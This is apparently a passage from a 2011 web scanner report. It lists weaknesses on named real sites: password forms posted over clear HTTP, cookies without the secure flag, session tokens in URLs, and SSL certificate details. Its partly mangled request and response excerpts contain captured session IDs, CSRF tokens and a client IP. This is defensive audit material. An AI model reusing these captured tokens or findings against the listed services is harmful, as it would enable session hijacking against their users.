The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
4.1. http://shoprunner.force.com/content/JsContentElementsDRGS
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://shoprunner.force.com
Path:
/content/JsContentElementsDRGS
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:http://shoprunner.force.com/content/step1
Request
GET /content/JsContentElementsDRGS HTTP/1.1;q=0.7
Response
HTTP/1.1 200 OK-------------------------------- */...[SNIP]... <form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions.validate.form(\'sr_lrn1F\')){sr_$.actions.learnStep(2);}return false;"> <h4 class="sr_htag">...[SNIP]... <input class="sr_vpassword" name="password2" tabindex="1" type="password"> </li>...[SNIP]...
4.2. http://www.thewhir.com/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thewhir.com
Path:
/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:http://www.thewhir.com/Auth/login
Request
GET /web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=godaddy+hack#sclient=psy-ab&hl=en&tbo=1&tbs=qdr:w&source=hp&q=godaddy%20malware%20attack&pbx=1&oq=&aq=&aqi=&aql=&gs_sm=&gs_upl=&tbo=1&fp=1&biw=1407&bih=1005&pf=p&pdl=500&bav=on.2,or.r_gc.r_pw.&cad=b/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.co...[SNIP]... <form action="/Auth/login" method="post"> ...[SNIP]... <input name="password" type="password" class="input" /> <br />...[SNIP]...
5. SSL cookie without secure flag set
previous
next
There are 9 instances of this issue:
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
5.1. https://email.secureserver.net/
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://email.secureserver.net
Path:
/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:PHPSESSID=d25fc93ae88ce9e1cd32f84099433d38; path=/; domain=email.secureserver.net
Request
GET / HTTP/1.1/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 302 FoundSet-Cookie: PHPSESSID=d25fc93ae88ce9e1cd32f84099433d38; path=/; domain=email.secureserver.net server.net/?app=wbe
5.2. https://portal.opera.com/accounts/login/
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://portal.opera.com
Path:
/accounts/login/
Issue detail
The following cookies were issued by the application and do not have the secure flag set:csrftoken=838dab485752a3df29256e939fd2d3cb; expires=Fri, 14-Sep-2012 16:25:28 GMT; Max-Age=31449600; Path=/ opal_sessionid=46086d7992e13cfe7e9bdef9bd665ed5; expires=Fri, 30-Sep-2011 16:25:28 GMT; Max-Age=1209600; Path=/
Request
GET /accounts/login/ HTTP/1.1/portal/tabs/?tab_name=Opera%20Portal/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/; opal_sessionid=46086d7992e13cfe7e9bdef9bd665ed5; csrftoken=838dab485752a3df29256e939fd2d3cb; __utma=258618251.1095286181.1316208009.1316208009.1316208009.1; __utmb=258618251.2.10.1316208016; __utmc=258618251; __utmz=258618251.1316208016.1.1.utmcsr=opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/company/
Response
HTTP/1.1 200 OK,Accept-Encoding/static/misc/yadis.xrdfSet-Cookie: csrftoken=838dab485752a3df29256e939fd2d3cb; expires=Fri, 14-Sep-2012 16:25:28 GMT; Max-Age=31449600; Path=/ Set-Cookie: opal_sessionid=46086d7992e13cfe7e9bdef9bd665ed5; expires=Fri, 30-Sep-2011 16:25:28 GMT; Max-Age=1209600; Path=/ ...[SNIP]...
5.3. https://www.smtp.com/signup
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://www.smtp.com
Path:
/signup
Issue detail
The following cookie was issued by the application and does not have the secure flag set:_global_session=BAh7CDoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOhBfY3NyZl90b2tlbiIxcVNXak9kck5TK2dKaGYwUEtoUjQ4UGpNTGozeC9RejlGUjM0a0xZTEpzND06D3Nlc3Npb25faWQiJTgyMzI5Y2M4NmE0M2FjMGE5MzQ1MzQ0NzM4ZGJmNWU1--9d864407dc9132ffb7b5e9c9928c23d380537ed3; path=/; HttpOnly
Request
GET /signup HTTP/1.1/service-info/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd; __utma=173546785.673105426.1316204863.1316204863.1316204863.1; __utmb=173546785.2.10.1316204863; __utmc=173546785; __utmz=173546785.1316204863.1.1.utmgclid=CJWNm_2JoqsCFSg1gwodCS0_kQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server
Response
HTTP/1.1 200 OK5fb6813a39fd7"Set-Cookie: _global_session=BAh7CDoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOhBfY3NyZl90b2tlbiIxcVNXak9kck5TK2dKaGYwUEtoUjQ4UGpNTGozeC9RejlGUjM0a0xZTEpzND06D3Nlc3Npb25faWQiJTgyMzI5Y2M4NmE0M2FjMGE5MzQ1MzQ0NzM4ZGJmNWU1--9d864407dc9132ffb7b5e9c9928c23d380537ed3; path=/; HttpOnly /xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en">...[SNIP]...
5.4. https://idp.godaddy.com/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/login.aspx
Issue detail
The following cookie was issued by the application and does not have the secure flag set:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:00 GMT; path=/
Request
POST /login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3A%2F%2Fwww.godaddy.com%2F HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; currency1=potableSourceStr=USD; adc1=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic==false&pass_focus=false&loginname=xss&password=xss&Login.x=30&Login.y=20
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:00 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
5.5. https://idp.godaddy.com/retrieveaccount.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/retrieveaccount.aspx
Issue detail
The following cookie was issued by the application and does not have the secure flag set:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:11 GMT; path=/
Request
GET /retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB181 HTTP/1.1/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3A%2F%2Fwww.godaddy.com%2F/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ASP.NET_SessionId=fubx1k3jh1q5dtrpmjpdfb45; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:11 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
5.6. https://idp.godaddy.com/shopper_new.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/shopper_new.aspx
Issue detail
The following cookie was issued by the application and does not have the secure flag set:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:18 GMT; path=/
Request
GET /shopper_new.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181 HTTP/1.1/retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB181/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ASP.NET_SessionId=fubx1k3jh1q5dtrpmjpdfb45; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:18 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]...
5.7. https://mya.godaddy.com/Default.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://mya.godaddy.com
Path:
/Default.aspx
Issue detail
The following cookies were issued by the application and do not have the secure flag set:ShopperId1=icrggiheobkgocvhqhmjwbmindlamiea; domain=godaddy.com; expires=Thu, 16-Sep-2021 18:08:24 GMT; path=/ currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:24 GMT; path=/ traffic=cookies=1&referrer=&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&ci=13025&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/
Request
GET /Default.aspx?idpinfo=none&myaurl=%2fdefault.aspx&ci=13025 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; adc1=US; traffic=; ASP.NET_SessionId=sxaobr55fgak5g55bzrndx2d
Response
HTTP/1.1 200 OKSet-Cookie: ShopperId1=icrggiheobkgocvhqhmjwbmindlamiea; domain=godaddy.com; expires=Thu, 16-Sep-2021 18:08:24 GMT; path=/ Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:24 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&ci=13025&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
5.8. https://mya.godaddy.com/myrenewals/myRenewals.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://mya.godaddy.com
Path:
/myrenewals/myRenewals.aspx
Issue detail
The following cookies were issued by the application and do not have the secure flag set:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:09:07 GMT; path=/ traffic=cookies=1&referrer=https://idp.godaddy.com/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx&sitename=mya.godaddy.com&page=/myrenewals/myRenewals.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=ci=11279&tab=products&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=4d9fa55d-454a-463a-ad89-702facb7913c&referringdomain=&split=45; domain=godaddy.com; path=/
Request
GET /myrenewals/myRenewals.aspx?ci=11279&tab=products HTTP/1.1/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; ASP.NET_SessionId=sxaobr55fgak5g55bzrndx2d; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:09:07 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=https://idp.godaddy.com/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx&sitename=mya.godaddy.com&page=/myrenewals/myRenewals.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=ci=11279&tab=products&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=4d9fa55d-454a-463a-ad89-702facb7913c&referringdomain=&split=45; domain=godaddy.com; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
5.9. https://www.jangosmtp.com/login.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.jangosmtp.com
Path:
/login.asp
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JangoMail=Word=SMTP+server&Referrer=http%3A%2F%2Fwww%2Ejangosmtp%2Ecom%2Flogin%2Easp&Search=g; expires=Fri, 16-Dec-2011 16:30:42 GMT; path=/
Request
GET /login.asp?status=failed HTTP/1.1/login.asp/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3+server&Referrer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF%2D8%26q%3Dsmtp%2Bserver&Search=g; ASPSESSIONIDSCTSBTQQ=PLBPJOABDACEOGJJFNFHKHNJ; __utma=213119631.1093174196.1316204842.1316204842.1316204842.1; __utmb=213119631.5.10.1316204842; __utmc=213119631; __utmz=213119631.1316204842.1.1.utmgclid=CKGSi_aJoqsCFRdTgwod5zgZiw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; _chartbeat2=vs5g6yeo9lxk52er.1316204846394; ASPSESSIONIDSCTWBTQQ=DJNPJOABFNFKEADPKMALIIHA
Response
HTTP/1.1 200 OKSet-Cookie: JangoMail=Word=SMTP+server&Referrer=http%3A%2F%2Fwww%2Ejangosmtp%2Ecom%2Flogin%2Easp&Search=g; expires=Fri, 16-Dec-2011 16:30:42 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
6. Session token in URL
previous
next
There are 4 instances of this issue:
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
6.1. http://l.sharethis.com/pview
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://l.sharethis.com
Path:
/pview
Issue detail
The URL in the request appears to contain a session token within the query string:http://l.sharethis.com/pview?event=pview&source=share4x&publisher=1a6a05c9-70bf-47c6-934c-8f49797a286d&hostname=www.blackbaud.com&location=%2F&url=http%3A%2F%2Fwww.blackbaud.com%2F&sessionID=1316204996133.78228&fpc=2381d63-13273ee6625-2ae88b10-1&ts1316204996203.0
Request
GET /pview?event=pview&source=share4x&publisher=1a6a05c9-70bf-47c6-934c-8f49797a286d&hostname=www.blackbaud.com&location=%2F&url=http%3A%2F%2Fwww.blackbaud.com%2F&sessionID=1316204996133.78228 &fpc=2381d63-13273ee6625-2ae88b10-1&ts1316204996203.0 HTTP/1.1;q=0.3T7FCnHuAg==
Response
HTTP/1.1 204 No Content
6.2. http://lb-static1-1568763564.us-east-1.elb.amazonaws.com/pix.gif
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://lb-static1-1568763564.us-east-1.elb.amazonaws.com
Path:
/pix.gif
Issue detail
The URL in the request appears to contain a session token within the query string:http://lb-static1-1568763564.us-east-1.elb.amazonaws.com/pix.gif?acct_id=4034&ptype=other&session_id=7B1B08A6C5BF4A968C79C9BFB007FDD0&version=0.2&url=http%3A%2F%2Fwww.drugstore.com%2F&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&sid=undefined&cookie=uid%3D5299788113416%3A&cookie2=undefined&rand=0.7498447701566854&type=pageview&title=drugstore.com%20Online%20Pharmacy%20-%20Prescription%20Drugs%2C%20Health%20and%20Beauty%2C%20plus%20more&briu=http%3A%2F%2Fpics.drugstore.com%2Fcatimg%2F288247%2F091211-HP-QA-YesTo-GWP.jpg%3A%3A%3Ahttp%3A%2F%2Fa216.g.akamai.net%2Ff%2F216%2F580%2F1d%2Fwww.drugstore.com%2Fimg%2Ffooter%2Fhp_legal.gif%3A%3A%3Ahttp%3A%2F%2Fs0.2mdn.net%2F3232177%2FBAN_naturalinstinctsjas_AugustUpdateBaseBlank_300x250_FY1112_Q1_Static.jpg%3A%3A%3Ahttp%3A%2F%2Fpics.drugstore.com%2Fcatimg%2F284540%2F052011_home_NEW_CUSTOMER_B1.jpg%3A%3A%3Ahttp%3A%2F%2Fpics.drugstore.com%2Fcatimg%2F279258%2F052011_home_A1.gif
Request
GET /pix.gif?acct_id=4034&ptype=other&session_id=7B1B08A6C5BF4A968C79C9BFB007FDD0 &version=0.2&url=http%3A%2F%2Fwww.drugstore.com%2F&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&sid=undefined&cookie=uid%3D5299788113416%3A&cookie2=undefined&rand=0.7498447701566854&type=pageview&title=drugstore.com%20Online%20Pharmacy%20-%20Prescription%20Drugs%2C%20Health%20and%20Beauty%2C%20plus%20more&briu=http%3A%2F%2Fpics.drugstore.com%2Fcatimg%2F288247%2F091211-HP-QA-YesTo-GWP.jpg%3A%3A%3Ahttp%3A%2F%2Fa216.g.akamai.net%2Ff%2F216%2F580%2F1d%2Fwww.drugstore.com%2Fimg%2Ffooter%2Fhp_legal.gif%3A%3A%3Ahttp%3A%2F%2Fs0.2mdn.net%2F3232177%2FBAN_naturalinstinctsjas_AugustUpdateBaseBlank_300x250_FY1112_Q1_Static.jpg%3A%3A%3Ahttp%3A%2F%2Fpics.drugstore.com%2Fcatimg%2F284540%2F052011_home_NEW_CUSTOMER_B1.jpg%3A%3A%3Ahttp%3A%2F%2Fpics.drugstore.com%2Fcatimg%2F279258%2F052011_home_A1.gif HTTP/1.1-east-1.elb.amazonaws.com/*;q=0.5;q=0.798af90:T=1313103241:S=ALNI_MbNITSOYYIhD8v2oycQZIr0GR3Yfw
Response
HTTP/1.1 200 OK..,...........D..;
6.3. http://player.ooyala.com/sas/authorized
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://player.ooyala.com
Path:
/sas/authorized
Issue detail
The URL in the request appears to contain a session token within the query string:http://player.ooyala.com/sas/authorized?analytics%5Fparams=%7B%22pcode%22%3A%22wyeGQ6jDkDGPl6NtyUg7PqDeUT6m%22%7D&token=AA%2Dh5tZUIJpe%2D004e736a2b%2DWcM4DZhB1IdvreCJy%2EqCGDv0dNiTv94KJs%5FiW5sNZ9E&domain=go%2Eicontact%2Ecom&embed%5Fcode%5Flist=BxcnZkMjpvja5pkM5Te%5Fe%5FrArpHwljfi×tamp=1316204885993&parent%5Fauthorized=true&signature=XrvF5L%2Fm0Qniyn6fdpWYUlJESkrm1f6H6QtyhnZHVIw&device=WIN%2010%2C3%2C183%2C7
Request
GET /sas/authorized?analytics%5Fparams=%7B%22pcode%22%3A%22wyeGQ6jDkDGPl6NtyUg7PqDeUT6m%22%7D&token=AA%2Dh5tZUIJpe%2D004e736a2b%2DWcM4DZhB1IdvreCJy%2EqCGDv0dNiTv94KJs%5FiW5sNZ9E &domain=go%2Eicontact%2Ecom&embed%5Fcode%5Flist=BxcnZkMjpvja5pkM5Te%5Fe%5FrArpHwljfi×tamp=1316204885993&parent%5Fauthorized=true&signature=XrvF5L%2Fm0Qniyn6fdpWYUlJESkrm1f6H6QtyhnZHVIw&device=WIN%2010%2C3%2C183%2C7 HTTP/1.1/static/cacheable/8933d67147be1f15015cae08f54944fc/player_v2.swf;q=0.3.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OKj7UHoVA5SoOKJZfUYARwEWh20f8hUfoPyqlj95ioUBx7KzJFXPGUv5FbHTUlVIZ8orGocXxfdkZ/uRiT+2eWiR6pJPHq3xGV+8A1RAx6J3LYNa9rSFpE4Z6y...[SNIP]...
6.4. http://www.apture.com/js/apture.js
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.apture.com
Path:
/js/apture.js
Issue detail
The URL in the request appears to contain a session token within the query string:http://www.apture.com/js/apture.js?siteToken=w522Fk6
Request
GET /js/apture.js?siteToken=w522Fk6 HTTP/1.1;q=0.3
Response
HTTP/1.0 200 OK.apture=B||{};"http://thehackernews.com/";A.visitId="f0fd86c367944cc5a879be24091fc3a1";A.userCookieId="FQtL8KWd11";A.aptur...[SNIP]...
7. SSL certificate
previous
next
There are 7 instances of this issue:
Issue background
SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.
7.1. https://login.secureserver.net/
previous
next
Summary
Severity:
Medium
Confidence:
Certain
Host:
https://login.secureserver.net
Path:
/
Issue detail
The following problem was identified with the server's SSL certificate:The server's certificate is not valid for the server's hostname. Server certificate Issued to: *.login.secureserver.net Issued by: Starfield Secure Certification Authority Valid from: Fri Oct 22 20:32:05 CDT 2010 Valid to: Mon Oct 22 20:32:05 CDT 2012
Certificate chain #1 Issued to: Starfield Secure Certification Authority Issued by: Starfield Class 2 Certification Authority Valid from: Wed Nov 15 19:15:40 CST 2006 Valid to: Sun Nov 15 19:15:40 CST 2026
Certificate chain #2 Issued to: Starfield Class 2 Certification Authority Issued by: http://www.valicert.com/ Valid from: Tue Jun 29 12:39:16 CDT 2004 Valid to: Sat Jun 29 12:39:16 CDT 2024
Certificate chain #3 Issued to: http://www.valicert.com/ Issued by: http://www.valicert.com/ Valid from: Fri Jun 25 19:19:54 CDT 1999 Valid to: Tue Jun 25 19:19:54 CDT 2019
Certificate chain #4 Issued to: http://www.valicert.com/ Issued by: http://www.valicert.com/ Valid from: Fri Jun 25 19:19:54 CDT 1999 Valid to: Tue Jun 25 19:19:54 CDT 2019
7.2. https://email.secureserver.net/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://email.secureserver.net
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational.Server certificate Issued to: email.secureserver.net Issued by: Starfield Secure Certification Authority Valid from: Thu Mar 17 11:02:01 CDT 2011 Valid to: Wed Apr 03 18:48:48 CDT 2013
Certificate chain #1 Issued to: Starfield Secure Certification Authority Issued by: Starfield Class 2 Certification Authority Valid from: Wed Nov 15 19:15:40 CST 2006 Valid to: Sun Nov 15 19:15:40 CST 2026
Certificate chain #2 Issued to: Starfield Class 2 Certification Authority Issued by: http://www.valicert.com/ Valid from: Tue Jun 29 12:39:16 CDT 2004 Valid to: Sat Jun 29 12:39:16 CDT 2024
Certificate chain #3 Issued to: http://www.valicert.com/ Issued by: http://www.valicert.com/ Valid from: Fri Jun 25 19:19:54 CDT 1999 Valid to: Tue Jun 25 19:19:54 CDT 2019
Certificate chain #4 Issued to: http://www.valicert.com/ Issued by: http://www.valicert.com/ Valid from: Fri Jun 25 19:19:54 CDT 1999 Valid to: Tue Jun 25 19:19:54 CDT 2019
7.3. https://fonts.googleapis.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://fonts.googleapis.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational.Server certificate Issued to: *.googleapis.com Issued by: Google Internet Authority Valid from: Mon Sep 05 01:06:00 CDT 2011 Valid to: Wed Sep 05 01:16:00 CDT 2012
Certificate chain #1 Issued to: Google Internet Authority Issued by: Equifax Secure Certificate Authority Valid from: Mon Jun 08 15:43:27 CDT 2009 Valid to: Fri Jun 07 14:43:27 CDT 2013
Certificate chain #2 Issued to: Equifax Secure Certificate Authority Issued by: Equifax Secure Certificate Authority Valid from: Sat Aug 22 11:41:51 CDT 1998 Valid to: Wed Aug 22 11:41:51 CDT 2018
7.4. https://idp.godaddy.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/
Issue detail
